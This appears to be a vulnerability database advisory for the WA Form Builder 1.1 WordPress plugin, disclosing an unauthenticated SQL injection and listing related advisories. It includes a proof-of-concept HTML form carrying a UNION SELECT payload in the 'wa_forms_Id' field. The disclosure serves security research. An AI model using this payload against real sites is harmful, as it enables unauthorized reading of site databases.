WA Form Builder 1.1 – Unauthenticated SQL Injection | Plugin Vulnerabilities

Description

$_POST[ ‘wa_forms_Id’ ] is not escaped. WAFormBuilder_ui_output() is accessible to any user.

Proof of Concept

<form method="post" action="http://www.example.com/?p=1">
    <input type="text" name="wa_forms_Id" value="0 UNION SELECT 1,2,3.4,5,6,7,8,9,10,11,12,13,name,15,16,17,slug FROM wp_terms WHERE term_id=1"/>
    <input type="text" name="action" value="insert_data"/>
    <input type="submit">
</form>

Affects Plugins

wa-form-builder

No known fix

References

URL

https://lenonleite.com.br/en/2016/11/29/wa-form-builder-1-1-sql-injection/

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Submitter

Lenon Leite

Submitter website

http://lenonleite.com.br

Submitter twitter

Verified

No

WPVDB ID

4a720545-54fd-4636-a6c7-a504531bf786

Timeline

Publicly Published

2016-12-05 (about 9 years ago)

Added

2016-12-06 (about 9 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2024-03-28

Title

CRM Perks Forms < 1.1.5 - Unauthenticated SQL Injection

Published

2020-05-18

Title

Ajax Load More < 5.3.2 - Authenticated SQL Injection

Published

2026-02-13

Title

Mail Mint < 1.19.3 - Authenticated (Administrator+) SQL Injection via Multiple API Endpoints

Published

2023-10-03

Title

Pressference Exporter <= 1.0.3 - Authenticated (Administrator+) SQL Injection

Published

2026-04-13

Title

SpeakOut! Email Petitions < 4.6.5.1 - Unauthenticated SQL Injection